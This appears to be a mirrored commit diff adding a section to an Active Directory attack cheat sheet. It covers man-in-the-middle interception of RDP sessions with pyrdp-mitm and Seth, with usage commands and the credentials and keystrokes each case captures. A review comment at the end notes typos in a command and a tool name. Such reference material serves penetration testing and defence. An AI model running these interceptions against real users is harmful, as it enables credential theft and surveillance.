mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Merge pull request #572 from sebch-/patch-3
Update Active Directory Attack.md
commit
31363e016b
1 changed files with 15 additions and 0 deletions
|
@ -2219,6 +2219,21 @@ secretsdump.py -k -no-pass target.lab.local
|
|||
# IP of PC1: 10.0.0.4
|
||||
```
|
||||
|
||||
#### Man-in-the-middle RDP connections with pyrdp-mitm
|
||||
* https://github.com/GoSecure/pyrdp
|
||||
* https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/
|
||||
* Usage
|
||||
```sh
|
||||
pyrdp-mitm.py <IP>
|
||||
pyrdp-mitp.py <IP>:<PORT> # with custom port
|
||||
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
|
||||
```
|
||||
* Exploitation
|
||||
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
|
||||
* If NLA is disabled, you will obtain the password in plaintext
|
||||
* Other features are available such as keystroke recording
|
||||
* Alternatives
|
||||
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
|
||||
|
||||
### Active Directory Certificate Services
|
||||
|
||||
|
|
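Review bot: the second line of the Usage block invokes `pyrdp-mitp.py`, while the lines before and after it invoke `pyrdp-mitm.py`. This looks like a typo, and the custom-port command would not resolve to the tool as written; change it to `pyrdp-mitm.py <IP>:<PORT>`. In the Alternatives bullet the tool is written "S3th" while the linked repository is named Seth, so use one spelling so readers can search for it. The first Exploitation bullet says the NLA case yields the client's "NetNTLMv2 challenge"; if what is captured is the client's response to the challenge, say so, since that is the detail a reader needs to judge the exposure when NLA is enabled versus disabled.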